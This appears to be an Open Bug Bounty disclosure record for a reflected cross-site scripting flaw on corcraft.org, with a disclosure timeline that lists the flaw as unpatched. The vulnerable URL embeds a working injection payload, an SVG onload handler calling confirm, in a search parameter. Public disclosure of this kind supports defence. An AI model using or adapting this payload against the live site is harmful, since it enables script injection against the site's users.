corcraft.org XSS vulnerability

2017-09-28T17:13:00
ID OBB:317303
Type openbugbounty
Reporter eb
Modified 2017-12-28T06:31:00

Description

Vulnerable URL:
http://www.corcraft.org/webapp/wcs/stores/servlet/CatalogSearchResultView?storeId=10001&langId;=-1&catalogId;=10051&pageSize;=10&beginIndex;=0&sType;=SimpleSearch&resultType;=2%22--!%3E%3CSvg/Onload=confirm`OPENBUGBOUNTY`%3E%22&searchTermScope;=3&orderBy1;=CatEntDescName&searchTerm;=XSS
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3960466
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 28 September, 2017 17:13 GMT
Vulnerability existence verified and confirmed| 29 September, 2017 06:14 GMT
Generic security notifications sent to website owner| 29 September, 2017 06:14 GMT
Notification sent to subscribers (without technical details)| 29 September, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 28 December, 2017 06:31 GMT